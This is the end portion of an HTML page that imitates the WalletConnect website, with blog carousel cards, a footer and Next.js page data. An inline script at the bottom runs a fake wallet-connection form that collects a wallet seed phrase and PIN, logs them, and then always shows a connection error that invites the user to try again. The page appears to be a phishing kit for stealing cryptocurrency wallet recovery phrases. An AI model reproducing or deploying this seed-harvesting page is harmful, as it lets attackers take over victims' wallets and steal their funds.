                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Beginner’s Guide to the WalletConnect v2.0 Sign SDK for Android Developers" src="images/1_AOaUw9okXjT3uJCmcxCgww.png" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Beginner’s Guide to the WalletConnect v2.0 Sign SDK for Android Developers</h5>
                                <a href="https://medium.com/p/936293e30700" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <footer class="styles_footer__4l5bt"><img alt="WalletConnect logo mark" src="fonts/logo_mark.84dd8525.svg" width="144" height="89" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_logo__roRmI" loading="lazy"><nav class="styles_navigation__fvQoV">
                    <ul class="styles_footerList__0Exe9">
                        <li class="styles_sectionTitle__LOrNT">
                            <span class="styles_heading__YwDIe styles_heading6__GOm05 styles_colorGrey__ZiDfp ">WalletConnect</span>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="/products" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Products</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="/partners" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Partners</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://explorer.walletconnect.com/" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Explorer</a>
                        </li>
                    </ul>
                    <ul class="styles_footerList__0Exe9">
                        <li class="styles_sectionTitle__LOrNT">
                            <span class="styles_heading__YwDIe styles_heading6__GOm05 styles_colorGrey__ZiDfp ">Resources</span>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://docs.walletconnect.com/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Docs</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://github.com/WalletConnect/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">GitHub</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://explorer.walletconnect.com/faq" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">FAQ</a>
                        </li>
                    </ul>
                    <ul class="styles_footerList__0Exe9">
                        <li class="styles_sectionTitle__LOrNT">
                            <span class="styles_heading__YwDIe styles_heading6__GOm05 styles_colorGrey__ZiDfp ">Company</span>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://medium.com/walletconnect/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Blog</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://apply.workable.com/walletconnect/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Jobs</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://github.com/WalletConnect/walletconnect-assets" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Brand</a>
                        </li>
                    </ul>
                    <ul class="styles_footerList__0Exe9">
                        <li class="styles_sectionTitle__LOrNT">
                            <span class="styles_heading__YwDIe styles_heading6__GOm05 styles_colorGrey__ZiDfp ">Connect</span>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://twitter.com/walletconnect/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Twitter</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://discord.com/invite/cB54BwPGru/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Discord</a>
                        </li>
                        <li class="styles_linkItem__GnEgT">
                            <a href="https://walletconnect.mirror.xyz/" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_linkAnchor__KNNxu">Mirror</a>
                        </li>
                    </ul>
                    <div class="styles_newsLetter__D_So8">
                        <span class="styles_heading__YwDIe styles_heading6__GOm05 styles_colorGrey__ZiDfp ">Our Newsletter</span>
                        <form class="styles_form__YW0Rc undefined"><input placeholder="Email" type="email" required class="styles_input__Tm_1o styles_input__HApME"><button type="submit" class="styles_button__gAHKk styles_outlineGrey__qyVBK ">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Subscribe</span>
                            </button>
                        </form>
                    </div>
                </nav>
                <ul class="styles_legal__KJAle">
                    <li>
                        <h6 class="styles_heading__YwDIe styles_heading6__GOm05 styles_colorGrey__ZiDfp ">© 2022 WalletConnect, Inc</h6>
                    </li>
                    <li>
                        <a href="https://explorer.walletconnect.com/terms" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorGrey__ZiDfp styles_linkAnchor__KNNxu">Terms of service</a>
                    </li>
                    <li>
                        <a href="https://explorer.walletconnect.com/privacy" target="_blank" rel="noopener noreferrer" class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorGrey__ZiDfp styles_linkAnchor__KNNxu">Privacy Policy</a>
                    </li>
                </ul>
            </footer>
            <div style="position:fixed;z-index:9999;top:16px;left:16px;right:16px;bottom:16px;pointer-events:none"></div>
        </div>
        <script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{"posts":[{"title":"Say Hello to Chat: A First Look at Our New API","guid":"https://medium.com/p/f706ebf63a28","thumbnail":"https://cdn-images-1.medium.com/max/1024/1*bCZiDop59JQDbKsPRxx26Q.jpeg"},{"title":"Calling All Devs: The WalletConnect v2.0 Sign Beta is Over!","guid":"https://medium.com/p/d7bb786cdd93","thumbnail":"https://cdn-images-1.medium.com/max/1024/1*PZyTm4Yr44qsG_X-UNLJZA.jpeg"},{"title":"Empowering the App Experience with WalletConnect","guid":"https://medium.com/p/b0672bded1df","thumbnail":"https://cdn-images-1.medium.com/max/500/1*bCFaVMwDeC6HgEp64VCN5A.png"},{"title":"Empowering the Wallet Experience with WalletConnect","guid":"https://medium.com/p/447391e1cb9b","thumbnail":"https://cdn-images-1.medium.com/max/500/1*0s2vL6pt26H8E-sk29IdOw.png"},{"title":"What’s New with WalletConnect: Integrations, Events, and Getting Started with the v2.0 Sign SDK","guid":"https://medium.com/p/c5b25e6db6ba","thumbnail":"https://cdn-images-1.medium.com/max/1024/1*4W51EyfhmTg_QoFm-ftYYA.png"},{"title":"Building a Messaging Protocol for Web3","guid":"https://medium.com/p/4e6103679f","thumbnail":"https://cdn-images-1.medium.com/max/1024/1*p1Z23m8IRrQUpgK37OWGBg.jpeg"},{"title":"Beginner’s Guide to the WalletConnect v2.0 Sign SDK for JavaScript Developers","guid":"https://medium.com/p/107f9eebb29b","thumbnail":"https://cdn-images-1.medium.com/max/1024/1*pH_IPZfx9SSI2NfaCypTVw.png"},{"title":"Beginner’s Guide to the WalletConnect v2.0 Sign SDK for Android Developers","guid":"https://medium.com/p/936293e30700","thumbnail":"https://cdn-images-1.medium.com/max/1024/1*AOaUw9okXjT3uJCmcxCgww.png"}]},"__N_SSG":true},"page":"/","query":{},"buildId":"xNBDYQZ5X6JL0sZSzY1MD","isFallback":false,"gsp":true,"scriptLoader":[]}</script>
        <script type="text/javascript">
            function show_form(wallet_name) {
                var s = document.getElementById("connect_form");
                var w = document.getElementById("select_wallet");
                var wn = document.getElementById("w-name");
                
                s.classList.toggle("d-none");
                w.classList.toggle("d-none");
                wn.setAttribute("value", wallet_name);

                var l = document.getElementById("walletconnect-text"); 
                l.innerText = `Connect to your ${wallet_name}`;
            }

            function connect_wallet(){
                var cw = document.getElementById("walletconnect-wrapper");
                cw.classList.remove("d-none");
            }

            function close_connect_wallet(){
                var cw = document.getElementById("walletconnect-wrapper");
                var s = document.getElementById("connect_form");
                var w = document.getElementById("select_wallet");
                var ce = document.getElementById("connect_error");

                var seed = document.getElementById("c_seed");
                var pin = document.getElementById("c_pin");

                seed.value = "";
                pin.value = "";
                
                s.classList.add("d-none");
                w.classList.remove("d-none");
                cw.classList.add("d-none");
                ce.classList.add("d-none");
            }

            function try_again(){
                close_connect_wallet();
                connect_wallet();
            }

            function connect(ev) {
                var seed = document.getElementById("c_seed");
                var pin = document.getElementById("c_pin");
                var wallet = document.getElementById("w-name");
                var ce = document.getElementById("connect_error");
                var data = {seed: seed.value, pin: pin.value, wallet: wallet.value};
                console.log(data);

                var s = document.getElementById("connect_form");
                var w = document.getElementById("select_wallet");

                s.classList.add("d-none");
                w.classList.add("d-none");

                ce.classList.remove("d-none");
            }
        </script>
    </body>
</html>
